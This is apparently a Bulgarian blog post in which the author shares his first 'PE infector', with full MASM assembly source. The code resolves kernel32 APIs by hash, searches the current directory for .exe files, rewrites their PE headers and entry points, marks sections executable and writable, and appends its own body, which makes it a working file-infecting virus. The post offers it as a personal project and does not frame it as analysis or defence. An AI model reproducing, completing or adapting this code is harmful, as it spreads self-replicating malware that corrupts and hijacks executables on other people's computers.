Това е моят първи PE инфектор написан на чист асамблер.
Спецификаций:Може да инфектира по един файл на веднъж, и инфектира само файлове в същата директория.
Асемблирал сам го с MASM.
А ето и кода:
.686p
.mmx
.MODEL flat,stdcall
OPTION CASEMAP:NONE
include kernel32.inc
includelib kernel32.lib
Include windows.inc
.code
blabla label near
string db "*.exe",0
ep dd ?
var dd 0000003ch
varr dd ?
entrypoint dd ?
newep dd ?
wfd WIN32_FIND_DATA
start:
nop
call delta
delta:
pop ebp
sub ebp,offset delta
pop esi
and esi,0FFF00000h
push esi
add esi,[esi+3Ch]
add esi,078h
mov edi,dword ptr [esi]
pop esi
add edi,esi
push esi
push edi
mov eax,[ebp+entrypoint]
mov [ep+ebp],eax
xor eax,eax
mov ebx,0903ebb2eh
call [GetThisFuckingAPIs]
lea ebx,[wfd+ebp]
lea eax,[string+ebp]
call goon ;FindFirstFileA
movd mm2,eax
add edx,1h
movd mm7,edx
pop edi
pop esi
push eax
push esi
push edi
mov ebx,02BD833FBh
xor eax,eax
call [GetThisFuckingAPIs]
movd mm,ecx ;CreateFileA
mov edi,ecx
OpenMyFile:
movd ecx,mm
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
lea eax,[wfd.cFileName+ebp]
push eax
call ecx ;CreateFileA
cmp eax,0FFFFFFFFh
jz test123
jmp notend
test123:
cmp ebp,0h
jz gogo
mov eax,[ep+ebp]
jmp eax
gogo:
push 0
Call ExitProcess
notend:
xor edx,edx
call Infection
movd edx,mm7
test edx,edx
jz here
add edx,01h
sub edx,edx
movd mm7,edx
pop edi
pop esi
push esi
push edi
mov ebx,0A38B216Eh
call [GetThisFuckingAPIs]
movd mm1,ecx ;FindNextFileA
pop edi
pop esi
pop eax
push esi
push edi
FindNextFile1:
movd ecx,mm1
lea ebx,[wfd+ebp]
call goon ;FindNextFileA
jmp OpenMyFile
goon proc
push ebx
push eax
call ecx
Ret
goon EndP
GetThisFuckingAPIs:
mov ecx,[edi+18h]
mov edx,[edi+20h]
add edx,esi
push ecx
push esi
push edi
mov edi,esi
mov esi,[edx]
add esi,edi
lol:
xor edi,edi
loop1:
lodsb
mov ecx,eax
add edi,eax
rol edi,cl
test eax,eax
jne loop1
cmp edi,ebx
je found
dec dword ptr[esp+08h]
jne lol
found:
pop EBX
pop EAX
pop ECX
mov edx,[ebx+18h]
mov edi,[ebx+24h]
add edi,eax
sub edx,ecx
shl edx,1
add edi,edx
movzx edx,word ptr[edi]
mov ebx,[ebx+1ch]
add ebx,eax
shl edx,2
add ebx,edx
xor ecx,ecx
add ecx,[ebx]
add ecx,eax
xor eax,eax
ret
here:
movd eax,mm2
jmp FindNextFile1
ret
Infection proc
push ebp
push eax
mov ebp,esp
add ebp,0Ch
mov edi,[ebp]
add ebp,04h
mov esi,[ebp]
mov ebx,0C4D9B34Ch ;ReadFile
call GetThisFuckingAPIs
movd mm3,ecx
mov esi,[ebp]
sub ebp,04h
mov edi,[ebp]
mov ebx,093FAD32Ch ;WriteFile
call GetThisFuckingAPIs
movd mm4,ecx
mov edi,[ebp]
add ebp,04h
mov esi,[ebp]
mov ebx,0119E9E92h ;CloseHandle
call GetThisFuckingAPIs
movd mm5,ecx
mov esi,[ebp]
sub ebp,04h
mov edi,[ebp]
mov ebx,0FD641C15h ;SetFilePointer
call GetThisFuckingAPIs
movd mm6,ecx
mov edi,[ebp]
add ebp,04h
mov esi,[ebp]
mov ebx,0C93E80D5h ;CancelIo
call GetThisFuckingAPIs
pop eax
pop ebp
push ecx
push ebp
push eax
pop eax
pop ebp
movd ecx,mm6
movd ecx,mm6
push eax
Reading:
call SetFilePointer1 ;SetFilePointer
mov edi,4h
mov eax,[esp]
call ReadFile1 ;ReadFile
pop eax
push [ebp+ var]
push eax
add [ebp+var],28h
movd ecx,mm6
pop eax
push eax
call SetFilePointer1 ;SetFilePointer
pop eax
push eax
mov edi,4h
call ReadFile1 ;ReadFile
mov esi,[ebp+var]
mov [ebp+entrypoint],esi
pop eax
pop [ebp+var]
push [ebp+var]
add [ebp+var],34h
push eax
movd ecx,mm6
call SetFilePointer1 ;SetFilePointer
pop eax
push eax
mov edi,4h
call ReadFile1
mov esi,[ebp+var]
add [ebp+entrypoint],esi
pop eax
pop [ebp+var]
push eax
movd ecx,mm6
pop eax
push [var+ebp]
push eax
add [var+ebp],6h
call SetFilePointer1 ;SetFilePointer
xor eax,eax
mov [ebp+varr],eax
mov [ebp+var],eax
pop eax
push eax
mov edi,2h
call ReadFile1;ReadFile
pop ecx
pop edx
push edx
push ecx
mov eax,[ebp+var]
mov ebx,28h
dec eax
imul eax,ebx
add edx,0F8h
add edx,eax
add edx,8h
mov esi,edx
pop eax
push edx
push eax
add edx,4h
mov [var+ebp],edx
pop eax
push eax
movd ecx,mm6
call SetFilePointer1 ;SetFilePointer
pop eax
push eax
mov edi,4h
call ReadFile1 ;ReadFile
mov edx,[ebp+var]
add edx,159h
mov [ebp+newep],edx
pop eax
pop edx
push edx
push eax
add edx,8h
mov [var+ebp],edx
pop eax
push eax
movd ecx,mm6
call SetFilePointer1
pop eax
push eax
mov edi,4h
call ReadFile1
mov edx,[ebp+var]
add [ebp+newep],edx
movd ecx,mm6
pop eax
pop edx
pop [var+ebp]
push edx
push eax
add [ebp+var],28h
movd ecx,mm6
call SetFilePointer1 ;SetFilePointer
pop eax
push eax
mov edx,[newep+ebp]
mov [var+ebp],edx
call WriteFile1 ; WriteFile
pop eax
pop edx
push eax
pop eax
push eax
mov [var+ebp],edx
movd ecx,mm6
call SetFilePointer1 ;SetFilePointer
pop eax
push eax
mov edi,4h
call ReadFile1 ;ReadFile
mov ebx,[ebp+var]
pop eax
push eax
mov [ebp+var],esi
movd ecx,mm6
call SetFilePointer1 ;SetFilePointer
mov [ebp+var],ebx
mov [ebp+varr],4h
pop eax
push eax
add [ebp+var],600h
pop eax
push [ebp+var]
push eax
call WriteFile1 ;WriteFile
add esi,8h
mov [var+ebp],esi
movd ecx,mm6
pop eax
push eax
movd ecx,mm6
call SetFilePointer1 ;SetFilePointer
pop eax
push eax
mov edi,4h
call ReadFile1 ;ReadFile
mov [ebp+varr],4h
pop eax
push eax
xchg [ebp+var],esi
push [ebp+var]
movd ecx,mm6
call SetFilePointer1 ;SetFilePointer
pop [ebp+var]
pop eax
push [ebp+var]
push eax
mov [ebp+var],esi
pop ecx
pop edi
pop eax
push edi
push ecx
push ecx
mov ecx,200h
xchg ecx,edx
xor edx,edx
div ecx
inc eax
imul eax,edx
xchg ecx,edx
mov [ebp+var],eax
call WriteFile1 ;WriteFile
pop eax
pop [ebp+var]
push eax
add [ebp+var],14h
movd ecx,mm6
call SetFilePointer1 ; SetFilePointer
mov [ebp+var],0E00000E0h
pop eax
push eax
call WriteFile1 ;WriteFile
pop eax
push eax
movd ecx,mm6
xchg [var+ebp],esi
push 2h
push 0h
push 0h
push eax
call ecx ;SetFilePointer
pop eax
pop ecx
push eax
push eax
call ecx ;CancelIo
mov [var+ebp],3ch
mov eax,[esp]
push 0h
lea ecx,[varr+ebp]
push ecx
push 600h
lea ebx,[blabla+ebp]
push ebx
push eax
movd ecx,mm4
call ecx ;WriteFile
pop eax
push eax
movd ecx,mm5
push eax
call ecx ;CloseHandle
Ret
SetFilePointer1:
push 0h
push 0h
push [var+ebp]
push eax
call ecx ;SetFilePointer
ret
ReadFile1:
movd ecx,mm3
push 0h
lea ebx,[varr+ebp]
push ebx
lea edx,[var+ebp]
push edi
push edx
push eax
call ecx ;ReadFile
ret
WriteFile1: ;WriteFile
push 0h
lea ecx,[varr+ebp]
push ecx
push 4h
lea ebx,[var+ebp]
push ebx
push eax
movd ecx,mm4
call ecx
ret
Infection EndP
End start
Няма коментари:
Публикуване на коментар